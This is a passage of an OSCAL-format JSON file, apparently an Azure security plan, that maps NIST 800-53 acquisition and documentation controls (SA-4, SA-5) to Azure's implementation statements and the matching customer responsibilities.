It is the role of Corporate, External, and Legal Affairs (CELA) to require language included in system acquisition contracts pertaining to the security requirements, as appropriate, through the Master Supplier Services Agreement (MSSA) or an equivalent type of agreement."}],"responsibilities":[{"uuid":"39c9fa68-c5e6-487d-a22a-4b0b201be626","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-017"}],"description":"The customer is responsible for implementing an acquisition process for customer-deployed resources that includes security and privacy functional requirements, strength of mechanism requirements, security and privacy assurance requirements, necessary controls to satisfy said security and privacy requirements, documentation requirements, requirements for protecting security and privacy-related documentation, a description of the customer's development and operating environments, allocation of or identification of parties responsible for security, privacy, and supply chain risk management, and the acceptance criteria for the contract.","provided-uuid":"137cd12d-fcd6-4a84-9d68-9465cba4d934"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"6d20519f-abf7-4c27-b130-25d373256811","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-018"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-4_smt.f","by-components":[{"uuid":"a6a5ddd4-6b45-48e1-be76-1e4e8c8def17","export":{"provided":[{"uuid":"2d24f017-5e16-4d22-8a1c-0ba2eb0becac","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-018"}],"description":"Azure 
implements the acquisitions control through enforcement of the Microsoft Security Policy (MSP). The Policy dictates that where a third party is allowed to (i) access, process, host or manage Microsoft's online services' information assets or information processing facilities, or (ii) add products or services to Microsoft's online services' information processing facilities, arrangements must be made in a formal contract to define responsibility and requirements for the security, confidentiality, integrity and availability of the information assets involved. Appropriate security and privacy standards are addressed in the agreement, to provide a level of protection against identified risks equivalent to that provided by the MSP. It is the role of Corporate, External, and Legal Affairs (CELA) to require language included in system acquisition contracts pertaining to the security requirements, as appropriate, through the Master Supplier Services Agreement (MSSA) or an equivalent type of agreement."}],"responsibilities":[{"uuid":"52ef1d4f-ab88-411f-91ce-c0238c6f4d04","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-018"}],"description":"The customer is responsible for implementing an acquisition process for customer-deployed resources that includes security and privacy functional requirements, strength of mechanism requirements, security and privacy assurance requirements, necessary controls to satisfy said security and privacy requirements, documentation requirements, requirements for protecting security and privacy-related documentation, a description of the customer's development and operating environments, allocation of or identification of parties responsible for security, privacy, and supply chain risk management, and the acceptance criteria for the contract.","provided-uuid":"2d24f017-5e16-4d22-8a1c-0ba2eb0becac"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"68c93acf-b026-4902-835e-25760ea640fb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-019"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-4_smt.g","by-components":[{"uuid":"c1133562-3069-48f0-b215-740f8062e371","export":{"provided":[{"uuid":"8cebfcc8-3355-476d-91db-9772aa94f8e8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-019"}],"description":"Azure implements the acquisitions control through enforcement of the Microsoft Security Policy (MSP). The Policy dictates that where a third party is allowed to (i) access, process, host or manage Microsoft's online services' information assets or information processing facilities, or (ii) add products or services to Microsoft's online services' information processing facilities, arrangements must be made in a formal contract to define responsibility and requirements for the security, confidentiality, integrity and availability of the information assets involved. Appropriate security and privacy standards are addressed in the agreement, to provide a level of protection against identified risks equivalent to that provided by the MSP. 
It is the role of Corporate, External, and Legal Affairs (CELA) to require language included in system acquisition contracts pertaining to the security requirements, as appropriate, through the Master Supplier Services Agreement (MSSA) or an equivalent type of agreement."}],"responsibilities":[{"uuid":"24f68ed9-d7ce-49bf-8334-274b61027612","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-019"}],"description":"The customer is responsible for implementing an acquisition process for customer-deployed resources that includes security and privacy functional requirements, strength of mechanism requirements, security and privacy assurance requirements, necessary controls to satisfy said security and privacy requirements, documentation requirements, requirements for protecting security and privacy-related documentation, a description of the customer's development and operating environments, allocation of or identification of parties responsible for security, privacy, and supply chain risk management, and the acceptance criteria for the contract.","provided-uuid":"8cebfcc8-3355-476d-91db-9772aa94f8e8"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"32491fa8-88a7-4a77-a741-6df4513ef1e3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-020"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-4_smt.h","by-components":[{"uuid":"861f5948-af50-4ee6-a054-96ad7c1fbca6","export":{"provided":[{"uuid":"421aa590-30a2-4872-ba24-2a682469b822","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-020"}],"description":"Azure 
implements the acquisitions control through enforcement of the Microsoft Security Policy (MSP). The Policy dictates that where a third party is allowed to (i) access, process, host or manage Microsoft's online services' information assets or information processing facilities, or (ii) add products or services to Microsoft's online services' information processing facilities, arrangements must be made in a formal contract to define responsibility and requirements for the security, confidentiality, integrity and availability of the information assets involved. Appropriate security and privacy standards are addressed in the agreement, to provide a level of protection against identified risks equivalent to that provided by the MSP. It is the role of Corporate, External, and Legal Affairs (CELA) to require language included in system acquisition contracts pertaining to the security requirements, as appropriate, through the Master Supplier Services Agreement (MSSA) or an equivalent type of agreement."}],"responsibilities":[{"uuid":"82efa5a2-8815-4db0-902b-9b7218643724","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-020"}],"description":"The customer is responsible for implementing an acquisition process for customer-deployed resources that includes security and privacy functional requirements, strength of mechanism requirements, security and privacy assurance requirements, necessary controls to satisfy said security and privacy requirements, documentation requirements, requirements for protecting security and privacy-related documentation, a description of the customer's development and operating environments, allocation of or identification of parties responsible for security, privacy, and supply chain risk management, and the acceptance criteria for the contract.","provided-uuid":"421aa590-30a2-4872-ba24-2a682469b822"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"3c92a990-b3a4-4922-95e2-1ea6bbf0083a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-021"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-4_smt.i","by-components":[{"uuid":"f6b215d0-6c55-426d-8dae-3820da91b8cf","export":{"provided":[{"uuid":"2af45f11-406d-4077-95ac-4264ed7f99d9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-021"}],"description":"Azure implements the acquisitions control through enforcement of the Microsoft Security Policy (MSP). The Policy dictates that where a third party is allowed to (i) access, process, host or manage Microsoft's online services' information assets or information processing facilities, or (ii) add products or services to Microsoft's online services' information processing facilities, arrangements must be made in a formal contract to define responsibility and requirements for the security, confidentiality, integrity and availability of the information assets involved. Appropriate security and privacy standards are addressed in the agreement, to provide a level of protection against identified risks equivalent to that provided by the MSP. 
It is the role of Corporate, External, and Legal Affairs (CELA) to require language included in system acquisition contracts pertaining to the security requirements, as appropriate, through the Master Supplier Services Agreement (MSSA) or an equivalent type of agreement."}],"responsibilities":[{"uuid":"c4d61988-2eac-44e9-8cbf-4591e60d8387","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-021"}],"description":"The customer is responsible for implementing an acquisition process for customer-deployed resources that includes security and privacy functional requirements, strength of mechanism requirements, security and privacy assurance requirements, necessary controls to satisfy said security and privacy requirements, documentation requirements, requirements for protecting security and privacy-related documentation, a description of the customer's development and operating environments, allocation of or identification of parties responsible for security, privacy, and supply chain risk management, and the acceptance criteria for the contract.","provided-uuid":"2af45f11-406d-4077-95ac-4264ed7f99d9"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"df84eabb-d726-49ad-85e8-0d10f0ce5653","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-4.1","statements":[{"uuid":"3288168d-b838-425a-8c5f-a1db7e26e5d4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-022"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-4.1_smt","by-components":[{"uuid":"23d92439-3bbd-495c-a0b9-39e49910076a","export":{"provided":[{"uuid":"4b3a9e93-694a-4336-9752-7b437656268e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-022"}],"description":"The acquisition process includes contractual requirements to provide documentation of security functionality. Documentation provided in response to this requirement is stored by Azure service teams in their internal SharePoint sites."}],"responsibilities":[{"uuid":"c144e2d6-68ce-4035-852b-18b1a79db879","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-022"}],"description":"The customer is responsible for obtaining a description of the functional properties of security controls to be employed from the developer of the corresponding customer-deployed resource(s). Note: Microsoft Azure hosts the customer-deployed system. 
The customer can find a description of the security controls employed by Azure below.","provided-uuid":"4b3a9e93-694a-4336-9752-7b437656268e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"f15bb7e5-ddde-4b77-899a-e683add4fd7d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-4.2","statements":[{"uuid":"d916868c-d455-48ec-ac92-f69c2ae916e5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-023"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-4.2_smt","by-components":[{"uuid":"6bf57916-d069-4e6a-8c4d-76e0ab4bf6dc","export":{"provided":[{"uuid":"e905bd7d-1bb3-42fc-b422-9d58cde71628","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-023"}],"description":"The acquisition process includes contractual requirements to provide documentation of security functionality, including security-relevant external system interfaces and high-level design. 
Documentation provided in response to this requirement is stored by Azure service teams in their internal SharePoint sites."}],"responsibilities":[{"uuid":"4c105ce6-fb5a-4286-aa76-08562ab5405a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-023"}],"description":"The customer is responsible for obtaining design and implementation information for the security controls to be employed from the developer of the corresponding customer-deployed resource(s), which includes: security-relevant external system interfaces; high-level design; low-level design; source code schematics; and any customer-defined design/implementation information at an organization-defined level of detail in the design and implementation information. Note: Microsoft Azure hosts the customer-deployed system. The customer can find a description of the security controls employed by Azure below.","provided-uuid":"e905bd7d-1bb3-42fc-b422-9d58cde71628"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"80237b50-4d02-4376-b5a8-55adc04382e8","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-4.5","statements":[{"uuid":"c477bf7b-905c-4a07-835d-f215bad651a9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-024"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-4.5_smt.a","by-components":[{"uuid":"d16c71c4-3fb1-4dea-9b17-80c240d84f44","export":{"provided":[{"uuid":"72a41699-82e7-4196-9e52-da39ddcd693a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-024"}],"description":"Azure ensures that consistent and required configurations are applied through both Azure Security Pack (AzSecPack) implementations and the Security Development Lifecycle (SDL). AzSecPack ensures the application and enforcement of the Azure security baseline, which is based on a hyperscale-compatible subset of DISA STIG and CIS Benchmark requirements. 
The SDL ensures that any Microsoft-authored code complies with scanning and code requirements."}],"responsibilities":[{"uuid":"f580f894-108d-4f03-a3d2-917e616ad388","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-024"}],"description":"The customer is responsible for requiring the developer of the information system, system component, or information system service to deliver the system, component, or service with organization-defined security configurations implemented.","provided-uuid":"72a41699-82e7-4196-9e52-da39ddcd693a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"a183ffd5-bb69-4639-a5ef-dedea1de94f8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-025"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-4.5_smt.b","by-components":[{"uuid":"a2312ff5-68d9-4095-953a-ece4a2f30295","export":{"provided":[{"uuid":"673cfe62-ff52-4c20-bdac-39d573da0095","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-025"}],"description":"Azure ensures that consistent and required configurations are applied through both Azure Security Pack (AzSecPack) implementations and the Security Development Lifecycle (SDL). 
System, component, and service reinstallation and upgrade are handled through the same processes, ensuring consistency of baselines."}],"responsibilities":[{"uuid":"7920ef01-b1b6-41f6-aae3-2e3f7e5d967e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-025"}],"description":"The customer is responsible for requiring the developer of the information system, system component, or information system service to use the configurations as the default for any subsequent system, component, or service reinstallation or upgrade.","provided-uuid":"673cfe62-ff52-4c20-bdac-39d573da0095"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"896fd685-56bb-46ed-a61f-488dc876b7ec","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-4.9","statements":[{"uuid":"d6194bf1-40c7-40dc-a8a8-56975f5d8627","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-026"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-4.9_smt","by-components":[{"uuid":"25d38c7f-89d9-452a-ba05-cce94bd6542d","export":{"provided":[{"uuid":"df6ae244-be33-4c6c-a09b-9f3b310a840e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-026"}],"description":"Azure follows the Security Development Lifecycle (SDL) process, which includes as part of the design phase the identification of the functions, ports, protocols, and services intended for organizational use."}],"responsibilities":[{"uuid":"6199c913-be37-4dd2-9eb5-ed8db263c570","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-026"}],"description":"The customer is responsible for requiring the developer of customer-deployed resource(s) to identify ports, protocols, and services intended for use early in the SDLC. Note: Microsoft Azure hosts the customer-deployed system. The customer can find a description of the security controls employed by Azure below.","provided-uuid":"df6ae244-be33-4c6c-a09b-9f3b310a840e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"27750995-6442-45ba-b0c3-3921abd236ba","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-4.10","statements":[{"uuid":"ee402ee9-309d-4eeb-a7e9-061470ce39a1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-027"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"sa-4.10_smt","by-components":[{"uuid":"36ef34df-2e0e-459c-8a84-3069b1b6341a","export":{"provided":[{"uuid":"49c24291-2d3e-40ce-b9e0-83e716cf4b2a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-027"}],"description":"Azure does not utilize Personal Identity Verification (PIV) credentials for internal personnel because PIV cards are not available to Azure."}],"responsibilities":[{"uuid":"3f2732ec-4b3d-402c-a957-494757073af2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-027"}],"description":"The customer is responsible for employing FIPS 
201-approved technology products to support Personal Identity Verification (PIV) capability. Note: if the customer does not deploy PIV credentials this control is not applicable.","provided-uuid":"49c24291-2d3e-40ce-b9e0-83e716cf4b2a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"675c4fc5-51f3-442c-9d53-f1398522d693","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-5","statements":[{"uuid":"96c9e2e1-3866-495f-9566-8dde0b61daea","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-028"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-029"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-030"}],"statement-id":"sa-5_smt.a","by-components":[{"uuid":"1b16a63a-4d03-46b7-8cdf-2a5bcfd9e592","export":{"provided":[{"uuid":"c2d1eba0-71ea-44f6-b2df-e9d311fe2892","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-028"}],"description":"Azure service teams maintain, secure, manage, and store information system documentation, including documentation regarding secure configuration, installation, and operation of the Azure cloud. This documentation is stored in each service team's SharePoint site or internal Microsoft website such as KnowledgeBase and made available to service team members. 
Microsoft ensures the appropriate service team maintains, secures, manages, transmits and stores all service-specific documentation to prevent unauthorized access and misuse. Microsoft considers all documentation to be categorized as a system asset. The service team is responsible for classifying its assets and employing the associated safeguards according to the Asset Classification Standard and Asset Protection Standard, as well as any additional requirements defined by the service team. An asset is something that supports the delivery of the Azure service or has other business value to its internal Microsoft owner. The service's documentation inventory is located on the team SharePoint site or internal Microsoft website such as KnowledgeBase. The inventory of such document assets is maintained by service team Technical Support personnel and is updated as needed when new assets are created, installed or identified or the asset owner, location or security classification requires modification."},{"uuid":"8f2c394a-bdef-4e44-a96e-01bdf48c1eaa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-029"}],"description":"Azure service teams maintain, secure, manage, and store information system documentation, including documentation regarding effective use and maintenance of security and privacy features/functions of the Azure cloud. This documentation is stored in each service team's SharePoint site or internal Microsoft website such as KnowledgeBase and made available to service team members. Service team documentation, including but not limited to Standard Operating Procedures and Troubleshooting Guides (TSGs), are stored on each team's respective SharePoint site or internal Microsoft website such as KnowledgeBase as referenced in each team's asset inventory. 
Authorized service team personnel routinely develop, maintain and store all related security documentation (e.g., security policies and procedures) and system configuration files on a continuous basis in accordance with regulatory requirements. Documentation is centrally managed and available to only authorized personnel using role-based access."},{"uuid":"4594d7f0-3cbf-4ba3-a75d-9d0c0529a6a5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-030"}],"description":"Azure service teams maintain, secure, manage, and store information system documentation, including documentation regarding known vulnerabilities regarding configuration and use of administrative (i.e. privileged) functions. Known vulnerabilities are identified in the assessment results and Plans of Action and Milestones (POA&Ms) as part of the Security Authorization package and maintained on the SharePoint site with the Azure Security Authorization documentation."}],"responsibilities":[{"uuid":"142e4378-bf39-490c-91ae-4c072f61a1ef","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-028"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for obtaining or developing administrator documentation for customer-deployed resources that describes secure configuration, installation, and operation of the customer-deployed resources.","provided-uuid":"c2d1eba0-71ea-44f6-b2df-e9d311fe2892"},{"uuid":"89f7ec00-fa5a-4f9e-93b4-6f2de8efceb2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-029"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for obtaining or developing administrator documentation for customer-deployed resources that describes effective use and maintenance of security and privacy 
functions/mechanisms.","provided-uuid":"8f2c394a-bdef-4e44-a96e-01bdf48c1eaa"},{"uuid":"4f489129-0bf1-46f4-9837-2b58adf4600c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-030"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for obtaining or developing administrator documentation for customer-deployed resources that describes known vulnerabilities regarding configuration and use of administrative (i.e., privileged) functions.","provided-uuid":"4594d7f0-3cbf-4ba3-a75d-9d0c0529a6a5"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"4c3a0a93-79a3-4819-8478-65672cde0abe","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-031"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-032"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-033"}],"statement-id":"sa-5_smt.b","by-components":[{"uuid":"ea28e237-afa2-40b0-ac8a-b545616ff45b","export":{"provided":[{"uuid":"8d7a7b78-26e5-4917-9f35-008b275e76a0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-031"}],"description":"Azure has extensive user-facing documentation on all aspects of the system, including security and privacy functions and their use. 
This documentation is available online at the following address: <https://learn.microsoft.com/en-us/azure/>"},{"uuid":"eb100a65-6d00-42f8-a090-843be1f13fa8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-032"}],"description":"Azure has extensive user-facing documentation on all aspects of the system, including methods for user interaction. This documentation is available online at the following address: <https://learn.microsoft.com/en-us/azure/>"},{"uuid":"6e603ca7-9113-4191-a310-15c1cb02722b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-033"}],"description":"Azure has extensive user-facing documentation on all aspects of the system, including maintaining the security of the service's resources and the privacy of individuals. This documentation is available online at the following address: <https://learn.microsoft.com/en-us/azure/>"}],"responsibilities":[{"uuid":"77bea9f1-2fba-4ffe-aec7-3ad1e104635f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-031"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for obtaining or developing user documentation for customer-deployed resources that describes user-accessible security and privacy functions/mechanisms and how to effectively use them.","provided-uuid":"8d7a7b78-26e5-4917-9f35-008b275e76a0"},{"uuid":"f75e7c09-28b9-43c9-96aa-93280c3179c2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-032"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for obtaining or developing user documentation for customer-deployed resources that describes methods for user interaction, which enables individuals to use the customer-deployed resources in a more secure manner and protect individual 
privacy.","provided-uuid":"eb100a65-6d00-42f8-a090-843be1f13fa8"},{"uuid":"ceca8b67-e6e3-47e7-9c8a-9c63d85dd9ee","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-033"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for obtaining or developing user documentation for customer-deployed resources that describes user responsibilities in maintaining the security of the customer-deployed resources and privacy of individuals.","provided-uuid":"6e603ca7-9113-4191-a310-15c1cb02722b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"e10ce57e-bdf9-4264-9b88-0a71f21dca98","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-034"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-5_smt.c","by-components":[{"uuid":"2ca101b2-1e13-4d45-aee5-20f603bec109","export":{"provided":[{"uuid":"2925c32b-6ac4-4a4d-9727-6e0a96c12389","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-034"}],"description":"Azure addresses attempts to obtain information system, system component, or information system service documentation when such documentation is either unavailable or nonexistent with preventive and detective measures. As a preventive measure, Azure requires only current software to be installed in the environment. The only operating system and server application software versions allowed in Online Services datacenters are approved current versions, approved legacy versions, and approved pre-release versions. 
In the case there is an inability to obtain needed documentation due to the age of the information system/component, the organization would track those needs via the Microsoft Operations Center (MOC). As a detective measure, the MOC maintains Troubleshooting Guides (TSGs) to address issues in the Azure environment with physical and virtual assets. These TSGs include low level design details to allow for Microsoft personnel to effectively analyze assets. The TSGs are widely available to all users of the environment; however, sensitive information (i.e. system architecture) is stored separately and requires user login/password to access. Access to the sensitive information is restricted to only MOC personnel. Documentation for externally-provided software (scanning tools) is available online at vendor websites._x000D_ _x000D_"}],"responsibilities":[{"uuid":"4fc50735-392b-4d53-8556-7df078599cbc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-034"}],"description":"The customer is responsible for documenting and taking customer-defined actions in response to attempts to obtain administrator and/or user documentation for customer-deployed resources when such documentation is not available/nonexistent.","provided-uuid":"2925c32b-6ac4-4a4d-9727-6e0a96c12389"}]},"description":"See inheritance and customer responsibility 
